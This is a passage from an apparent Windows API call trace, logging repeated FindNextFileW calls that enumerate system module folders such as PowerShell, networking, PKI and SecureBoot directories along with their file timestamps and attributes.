ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0226.004] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0226.004] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0226.004] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0226.004] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0226.005] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0226.005] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0226.005] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0226.005] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0226.005] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0226.006] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0226.006] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0226.006] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0226.006] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0226.006] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0226.007] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0226.007] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0226.007] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0226.007] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0226.007] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0226.008] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0226.008] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0226.008] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0226.008] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0226.008] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0226.009] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0226.009] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0226.009] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0226.009] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0226.009] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0226.010] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0226.010] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0226.010] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0226.010] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0226.010] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0226.011] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0226.011] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0226.011] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0226.011] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0226.012] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0226.012] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0226.012] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0226.012] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0226.012] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0226.013] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0226.013] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0226.013] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 